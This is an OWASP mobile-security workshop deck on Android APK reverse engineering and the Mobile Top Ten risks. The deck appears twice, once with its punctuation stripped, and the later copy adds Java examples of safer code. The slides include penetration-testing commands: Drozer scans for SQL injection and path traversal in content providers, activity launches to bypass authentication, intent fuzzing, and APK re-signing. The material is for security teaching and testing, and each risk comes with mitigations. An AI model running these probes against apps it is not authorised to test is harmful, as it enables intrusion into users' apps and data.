id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
[diagram: DEX → JAR → JAVA]
Decompiling – Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows you to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed-source Java decompilers
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
[diagram: DEX → SMALI]
Disassembling
• Apktool
  – Open-source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
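To make the "Anatomy of an apk" slide concrete: an APK is a plain zip, and the classes.dex inside it starts with a 0x70-byte header that carries two integrity fields, an Adler-32 checksum over everything after the checksum field and a SHA-1 over everything after the signature field. Dalvik and ART check the checksum when they load a dex, so a dex that was hand-patched (rather than rebuilt with apktool, which rewrites the header) must have both fields recomputed. The following is an added example, my code rather than anything from the workshop; the APK and dex it inspects are constructed in memory and consist of a header only, with no real classes.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.zip.Adler32;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

/** Added example: walk an APK (a zip) and validate the integrity fields of every .dex header in it. */
public final class ApkAnatomy {
    static final int HEADER_SIZE = 0x70;

    /** Lists the entries an analyst opens first and checks every .dex header found. */
    static List<String> inspect(byte[] apk) throws IOException, NoSuchAlgorithmException {
        List<String> report = new ArrayList<>();
        try (ZipInputStream zin = new ZipInputStream(new ByteArrayInputStream(apk))) {
            for (ZipEntry e = zin.getNextEntry(); e != null; e = zin.getNextEntry()) {
                byte[] data = zin.readAllBytes();   // reads up to the end of this entry only
                String name = e.getName();
                if (name.endsWith(".dex")) {
                    report.add(name + ": " + checkDexHeader(data));
                } else if (name.startsWith("META-INF/")
                        && (name.endsWith(".RSA") || name.endsWith(".DSA") || name.endsWith(".EC"))) {
                    report.add(name + ": signature block, " + data.length + " bytes");
                } else if (name.equals("AndroidManifest.xml")) {
                    report.add(name + ": binary XML, " + data.length + " bytes (apktool decodes it)");
                }
            }
        }
        return report;
    }

    /** Header layout: magic[8] | adler32 over [12,end) | sha1 over [32,end) | file_size | header_size | endian_tag | ... */
    static String checkDexHeader(byte[] dex) throws NoSuchAlgorithmException {
        if (dex.length < HEADER_SIZE) return "too short for a dex header";
        String magic = new String(dex, 0, 8, StandardCharsets.ISO_8859_1);
        if (!magic.startsWith("dex\n") || dex[7] != 0) return "bad magic";
        ByteBuffer bb = ByteBuffer.wrap(dex).order(ByteOrder.LITTLE_ENDIAN);
        long storedChecksum = bb.getInt(8) & 0xFFFFFFFFL;
        Adler32 adler = new Adler32();
        adler.update(dex, 12, dex.length - 12);
        MessageDigest sha1 = MessageDigest.getInstance("SHA-1");
        sha1.update(dex, 32, dex.length - 32);
        boolean sigOk = MessageDigest.isEqual(sha1.digest(), Arrays.copyOfRange(dex, 12, 32));
        long fileSize = bb.getInt(32) & 0xFFFFFFFFL;
        return "dex version " + magic.substring(4, 7)
                + ", checksum " + (adler.getValue() == storedChecksum ? "ok" : "MISMATCH")
                + ", sha1 " + (sigOk ? "ok" : "MISMATCH")
                + ", file_size " + (fileSize == dex.length ? "ok" : "MISMATCH");
    }

    /** Constructed test data: a header-only dex with correct digests (no classes inside). */
    static byte[] syntheticDex() throws NoSuchAlgorithmException {
        byte[] dex = new byte[HEADER_SIZE];
        System.arraycopy("dex\n035\0".getBytes(StandardCharsets.ISO_8859_1), 0, dex, 0, 8);
        ByteBuffer bb = ByteBuffer.wrap(dex).order(ByteOrder.LITTLE_ENDIAN);
        bb.putInt(32, HEADER_SIZE);   // file_size
        bb.putInt(36, HEADER_SIZE);   // header_size
        bb.putInt(40, 0x12345678);    // endian_tag
        MessageDigest sha1 = MessageDigest.getInstance("SHA-1");
        sha1.update(dex, 32, dex.length - 32);
        System.arraycopy(sha1.digest(), 0, dex, 12, 20);
        Adler32 adler = new Adler32();
        adler.update(dex, 12, dex.length - 12);   // covers the signature written just above
        bb.putInt(8, (int) adler.getValue());
        return dex;
    }

    /** Constructed test data: a two-entry zip standing in for an APK (the .RSA content is a placeholder). */
    static byte[] syntheticApk() throws IOException, NoSuchAlgorithmException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        try (ZipOutputStream zout = new ZipOutputStream(out)) {
            zout.putNextEntry(new ZipEntry("classes.dex"));
            zout.write(syntheticDex());
            zout.closeEntry();
            zout.putNextEntry(new ZipEntry("META-INF/CERT.RSA"));
            zout.write(new byte[16]);
            zout.closeEntry();
        }
        return out.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        for (String line : inspect(syntheticApk())) System.out.println(line);
        byte[] patched = syntheticDex();
        patched[HEADER_SIZE - 1] ^= 0x01;   // one byte changed after the digests, header not recomputed
        System.out.println("patched classes.dex: " + checkDexHeader(patched));
    }
}
```

Run it against a real APK by replacing syntheticApk() with the file's bytes; the intact dex reports both fields ok, while the patched copy shows why a smali edit has to go through apktool's build step (or a manual header fix) before the app will load.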
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple-words definition: the application does NOT implement TLS, or it does so incorrectly
What do you mean "incorrectly"?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple-words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about a developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple-words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application, via intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
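Three of the injection sinks the slides list (local-db SQL injection, data path traversal, intent injection) with the unsafe form next to the fixed one, as an added example in Android SDK code that is not from the deck. Table, column, action and class names are placeholders; the fixed forms are what the Drozer scanner modules above should no longer find.

```java
import android.content.Context;
import android.content.Intent;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;

/** Added example: each sink in its unsafe and its fixed form. */
final class ClientSideInjectionFixes {

    // 1. SQL injection into the local db (scanner.provider.injection)

    /** Unsafe: the caller's string is spliced into the statement and SQLite parses it as SQL. */
    static Cursor notesForOwnerUnsafe(SQLiteDatabase db, String owner) {
        return db.rawQuery("SELECT * FROM notes WHERE owner = '" + owner + "'", null);
    }

    /** Fixed: the value is a bound parameter, never part of the statement text. */
    static Cursor notesForOwner(SQLiteDatabase db, String owner) {
        return db.query("notes", null, "owner = ?", new String[] { owner }, null, null, null);
    }

    // 2. Data path traversal (scanner.provider.traversal), e.g. inside ContentProvider.openFile()

    /** Resolves a requested name strictly inside baseDir; ".." segments and symlinks are caught by canonicalisation. */
    static File resolveUnder(File baseDir, String requested) throws IOException {
        String base = baseDir.getCanonicalPath();
        File target = new File(baseDir, requested).getCanonicalFile();
        if (!target.getPath().startsWith(base + File.separator)) {
            throw new FileNotFoundException("refusing a path outside " + base);
        }
        return target;
    }

    // 3. Intent injection / hijacking: explicit Intents for anything internal

    /** Implicit: any installed app may declare a matching intent-filter and receive the extras, or be offered in the chooser. */
    static Intent openAccountImplicit(String accountId) {
        Intent i = new Intent("com.example.bank.OPEN_ACCOUNT");   // hypothetical action string
        i.putExtra("accountId", accountId);
        return i;
    }

    /** Explicit: a single component inside our own package; no other app can register for it. */
    static Intent openAccountExplicit(Context ctx, String accountId) {
        Intent i = new Intent();
        i.setClassName(ctx.getPackageName(), "com.example.bank.AccountActivity");   // hypothetical Activity
        i.putExtra("accountId", accountId);
        return i;
    }
}
```

The receiving side matters too: an Activity that reads extras from an Intent should treat them as untrusted input (check type and range before use), because with an exported component the sender can be any app on the device.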
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
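A server-side session store that follows the four mitigations, written as an added example (my code, not from the deck): tokens come from a CSPRNG rather than from the device ID, every session carries an idle and an absolute timeout, the old token is destroyed whenever the authentication state changes, and invalidation happens on the server, not by deleting a cookie on the client. The timeouts and the timeline in main() are constructed values; what "adjusted to your application" means is a product decision.

```java
import java.security.SecureRandom;
import java.time.Duration;
import java.time.Instant;
import java.util.Base64;
import java.util.Map;
import java.util.Optional;
import java.util.concurrent.ConcurrentHashMap;

/** Added example: server-side session store. The client only ever holds the opaque token string. */
public final class SessionStore {
    private static final class Session {
        final String userId;
        final Instant created;
        volatile Instant lastSeen;
        Session(String userId, Instant now) { this.userId = userId; this.created = now; this.lastSeen = now; }
    }

    private final Map<String, Session> sessions = new ConcurrentHashMap<>();
    private final SecureRandom rng = new SecureRandom();
    private final Duration idleTimeout;       // adjusted to the application: minutes for banking, longer for a reader
    private final Duration absoluteTimeout;   // hard upper bound regardless of activity

    public SessionStore(Duration idleTimeout, Duration absoluteTimeout) {
        this.idleTimeout = idleTimeout;
        this.absoluteTimeout = absoluteTimeout;
    }

    /** 256 bits from a CSPRNG. A token derived from the device ID, user ID or clock is guessable. */
    String newToken() {
        byte[] raw = new byte[32];
        rng.nextBytes(raw);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
    }

    /** Successful login: whatever token the client presented is destroyed and a fresh one is issued. */
    public String login(String userId, String presentedToken, Instant now) {
        if (presentedToken != null) sessions.remove(presentedToken);
        String token = newToken();
        sessions.put(token, new Session(userId, now));
        return token;
    }

    /** Resolves a token to a user. Expired sessions are removed on first touch and reported as absent. */
    public Optional<String> userFor(String token, Instant now) {
        Session s = token == null ? null : sessions.get(token);
        if (s == null) return Optional.empty();
        boolean idle = Duration.between(s.lastSeen, now).compareTo(idleTimeout) > 0;
        boolean tooOld = Duration.between(s.created, now).compareTo(absoluteTimeout) > 0;
        if (idle || tooOld) {
            sessions.remove(token);
            return Optional.empty();
        }
        s.lastSeen = now;
        return Optional.of(s.userId);
    }

    /** Logout invalidates on the server; a cookie deleted only on the client stays usable by whoever copied it. */
    public void logout(String token) { sessions.remove(token); }

    /** After a password change or a suspected compromise: destroy every session of that user. */
    public void logoutEverywhere(String userId) {
        sessions.entrySet().removeIf(e -> e.getValue().userId.equals(userId));
    }

    public static void main(String[] args) {
        SessionStore store = new SessionStore(Duration.ofMinutes(30), Duration.ofHours(12));
        Instant t0 = Instant.parse("2016-02-24T18:00:00Z");   // constructed timeline
        String alice = store.login("alice", null, t0);
        System.out.println("alice, 10 min later: " + store.userFor(alice, t0.plusSeconds(600)));
        // Authentication state changes on the same device: bob logs in while presenting alice's token.
        String bob = store.login("bob", alice, t0.plusSeconds(600));
        System.out.println("alice's old token after bob's login: " + store.userFor(alice, t0.plusSeconds(601)));
        // The "copy a cookie and try it after 30 minutes" test from the slide: 31 idle minutes exceeds the timeout.
        System.out.println("bob after 31 idle minutes: " + store.userFor(bob, t0.plusSeconds(600 + 31 * 60)));
        store.logoutEverywhere("bob");
        System.out.println("bob after logout everywhere: " + store.userFor(bob, t0.plusSeconds(600)));
    }
}
```

The three checks on the "how to find" slide map directly onto this class: the 30-minute replay hits the idle timeout in userFor(), the user switch hits the remove() at the top of login(), and guessing another session fails because nothing about the token is derived from the user or device.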
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
